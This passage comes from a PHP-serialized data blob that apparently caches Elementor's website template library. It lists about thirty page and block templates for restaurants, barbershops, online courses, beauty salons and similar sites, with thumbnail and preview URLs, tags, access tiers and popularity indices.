Construction\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Online-Store.png\";s:12:\"tmpl_created\";i:1647355154;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/online-store-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:59:\"[\"Landing Pages\",\"Online Shop\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:97;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:400;a:20:{s:4:\"tmpl\";i:691;s:2:\"id\";i:8996;s:5:\"title\";s:9:\"archive 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.8.jpg\";s:12:\"tmpl_created\";i:1528701290;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:227;s:11:\"trend_index\";i:153;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:401;a:20:{s:4:\"tmpl\";i:1010;s:2:\"id\";i:13960;s:5:\"title\";s:32:\"Japanese restaurant &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/06/Home-Page.jpg\";s:12:\"tmpl_created\";i:1592289775;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/japanese-restaurant-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:537;s:11:\"trend_index\";i:287;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:402;a:20:{s:4:\"tmpl\";i:1284;s:2:\"id\";i:22428;s:5:\"title\";s:40:\"Travel Agency &#8211; Under Construction\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Travel-Agency-1.png\";s:12:\"tmpl_created\";i:1647355339;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/travel-agency-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Agency\",\"Landing Pages\",\"Travel\",\"Under Construction\"]\";s:10:\"menu_order\";i:99;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:403;a:20:{s:4:\"tmpl\";i:692;s:2:\"id\";i:9001;s:5:\"title\";s:9:\"archive 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.9.jpg\";s:12:\"tmpl_created\";i:1528701433;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:265;s:11:\"trend_index\";i:208;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:404;a:20:{s:4:\"tmpl\";i:1007;s:2:\"id\";i:13993;s:5:\"title\";s:45:\"Japanese restaurant &#8211; Chef&#8217;s Menu\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/06/Chef_s-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/japanese-restaurant-chefs-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:651;s:11:\"trend_index\";i:675;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:405;a:20:{s:4:\"tmpl\";i:1006;s:2:\"id\";i:14012;s:5:\"title\";s:36:\"Japanese restaurant &#8211; Bar Menu\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/06/Bar-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/japanese-restaurant-bar-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:101;s:16:\"popularity_index\";i:735;s:11:\"trend_index\";i:829;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:406;a:20:{s:4:\"tmpl\";i:1005;s:2:\"id\";i:13917;s:5:\"title\";s:33:\"Japanese restaurant &#8211; About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/06/About-Page.jpg\";s:12:\"tmpl_created\";i:1592289629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/japanese-restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:102;s:16:\"popularity_index\";i:640;s:11:\"trend_index\";i:389;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:407;a:20:{s:4:\"tmpl\";i:997;s:2:\"id\";i:13528;s:5:\"title\";s:22:\"Barbershop &#8211; 404\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/05/404-Page.jpg\";s:12:\"tmpl_created\";i:1589893152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/barbershop-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:768;s:11:\"trend_index\";i:681;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:408;a:20:{s:4:\"tmpl\";i:1009;s:2:\"id\";i:13937;s:5:\"title\";s:35:\"Japanese restaurant &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1592289748;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/japanese-restaurant-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:648;s:11:\"trend_index\";i:551;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:409;a:20:{s:4:\"tmpl\";i:1008;s:2:\"id\";i:14030;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Events\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/06/Events-Page.jpg\";s:12:\"tmpl_created\";i:1592289713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/japanese-restaurant-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:104;s:16:\"popularity_index\";i:723;s:11:\"trend_index\";i:711;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:410;a:20:{s:4:\"tmpl\";i:998;s:2:\"id\";i:13518;s:5:\"title\";s:26:\"Barbershop &#8211; Archive\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Blog-Page.jpg\";s:12:\"tmpl_created\";i:1589893157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/barbershop-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:737;s:11:\"trend_index\";i:523;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:411;a:20:{s:4:\"tmpl\";i:1016;s:2:\"id\";i:13984;s:5:\"title\";s:40:\"Japanese restaurant &#8211; Reservations\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/reservations.jpg\";s:12:\"tmpl_created\";i:1592294757;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/japanese-restaurant-reservations/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:715;s:11:\"trend_index\";i:727;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:412;a:20:{s:4:\"tmpl\";i:999;s:2:\"id\";i:13479;s:5:\"title\";s:23:\"Barbershop &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Home-Page.jpg\";s:12:\"tmpl_created\";i:1589893275;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/barbershop-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:106;s:16:\"popularity_index\";i:683;s:11:\"trend_index\";i:832;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:413;a:20:{s:4:\"tmpl\";i:996;s:2:\"id\";i:13604;s:5:\"title\";s:25:\"Barbershop &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1589893147;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/barbershop-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"Barber Shop\",\"Barbershop\",\"Footer\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:555;s:11:\"trend_index\";i:267;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:414;a:20:{s:4:\"tmpl\";i:1000;s:2:\"id\";i:13503;s:5:\"title\";s:24:\"Barbershop &#8211; About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/05/About-Page.jpg\";s:12:\"tmpl_created\";i:1589893289;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/barbershop-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:744;s:11:\"trend_index\";i:739;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:415;a:20:{s:4:\"tmpl\";i:995;s:2:\"id\";i:13612;s:5:\"title\";s:25:\"Barbershop &#8211; Header\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/06/barber-shop-header.jpg\";s:12:\"tmpl_created\";i:1589893142;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/barbershop-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:37:\"[\"Barber Shop\",\"Barbershop\",\"Header\"]\";s:10:\"menu_order\";i:108;s:16:\"popularity_index\";i:343;s:11:\"trend_index\";i:137;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:416;a:20:{s:4:\"tmpl\";i:1001;s:2:\"id\";i:13548;s:5:\"title\";s:27:\"Barbershop &#8211; Services\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/05/Services-Page.jpg\";s:12:\"tmpl_created\";i:1589893298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/barbershop-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:108;s:16:\"popularity_index\";i:761;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:417;a:20:{s:4:\"tmpl\";i:1002;s:2:\"id\";i:13560;s:5:\"title\";s:26:\"Barbershop &#8211; Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1589893307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/barbershop-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:109;s:16:\"popularity_index\";i:756;s:11:\"trend_index\";i:822;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:418;a:20:{s:4:\"tmpl\";i:1003;s:2:\"id\";i:13587;s:5:\"title\";s:26:\"Barbershop &#8211; Contact\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/05/Contact-Us-Page.jpg\";s:12:\"tmpl_created\";i:1589893315;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/barbershop-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:110;s:16:\"popularity_index\";i:753;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:419;a:20:{s:4:\"tmpl\";i:982;s:2:\"id\";i:13307;s:5:\"title\";s:26:\"Online Course &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Home.jpg\";s:12:\"tmpl_created\";i:1587474541;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/online-course-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:230;s:11:\"trend_index\";i:125;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:420;a:20:{s:4:\"tmpl\";i:994;s:2:\"id\";i:13621;s:5:\"title\";s:30:\"Barbershop &#8211; Single Post\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/05/Single-Page.jpg\";s:12:\"tmpl_created\";i:1589893137;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/barbershop-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:111;s:16:\"popularity_index\";i:736;s:11:\"trend_index\";i:580;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:421;a:20:{s:4:\"tmpl\";i:1131;s:2:\"id\";i:16527;s:5:\"title\";s:24:\"Beauty Salon &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/12/404.jpg\";s:12:\"tmpl_created\";i:1608622517;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/beauty-salon-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:29:\"[\"404\",\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:742;s:11:\"trend_index\";i:563;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:422;a:20:{s:4:\"tmpl\";i:983;s:2:\"id\";i:13328;s:5:\"title\";s:27:\"Online Course &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/About.jpg\";s:12:\"tmpl_created\";i:1587474558;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/online-course-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:112;s:16:\"popularity_index\";i:508;s:11:\"trend_index\";i:429;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:423;a:20:{s:4:\"tmpl\";i:984;s:2:\"id\";i:13338;s:5:\"title\";s:33:\"Online Course &#8211; Course Page\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Course-Page.png\";s:12:\"tmpl_created\";i:1587474574;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/online-course-course-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:113;s:16:\"popularity_index\";i:337;s:11:\"trend_index\";i:310;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:424;a:20:{s:4:\"tmpl\";i:985;s:2:\"id\";i:13352;s:5:\"title\";s:29:\"Online Course &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1587474591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/online-course-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:114;s:16:\"popularity_index\";i:565;s:11:\"trend_index\";i:533;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:425;a:20:{s:4:\"tmpl\";i:1130;s:2:\"id\";i:16535;s:5:\"title\";s:27:\"Beauty Salon &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/12/Footer.jpg\";s:12:\"tmpl_created\";i:1608622498;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/beauty-salon-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:32:\"[\"Beauty Salon\",\"Footer\",\"Hair\"]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:524;s:11:\"trend_index\";i:126;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:426;a:20:{s:4:\"tmpl\";i:971;s:2:\"id\";i:13187;s:5:\"title\";s:33:\"Interior Design &#8211; Home Page\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Home.png\";s:12:\"tmpl_created\";i:1586148661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/interior-design-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:115;s:16:\"popularity_index\";i:331;s:11:\"trend_index\";i:264;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:427;a:20:{s:4:\"tmpl\";i:1453;s:2:\"id\";i:16346;s:5:\"title\";s:33:\"Your New Home &#8211; Real Estate\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp3-l.png\";s:12:\"tmpl_created\";i:1660205402;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/your-new-home-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:11:\"Real Estate\";s:4:\"tags\";s:31:\"[\"Landing Pages\",\"Real estate\"]\";s:10:\"menu_order\";i:116;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:428;a:20:{s:4:\"tmpl\";i:972;s:2:\"id\";i:13199;s:5:\"title\";s:29:\"Interior Design &#8211; 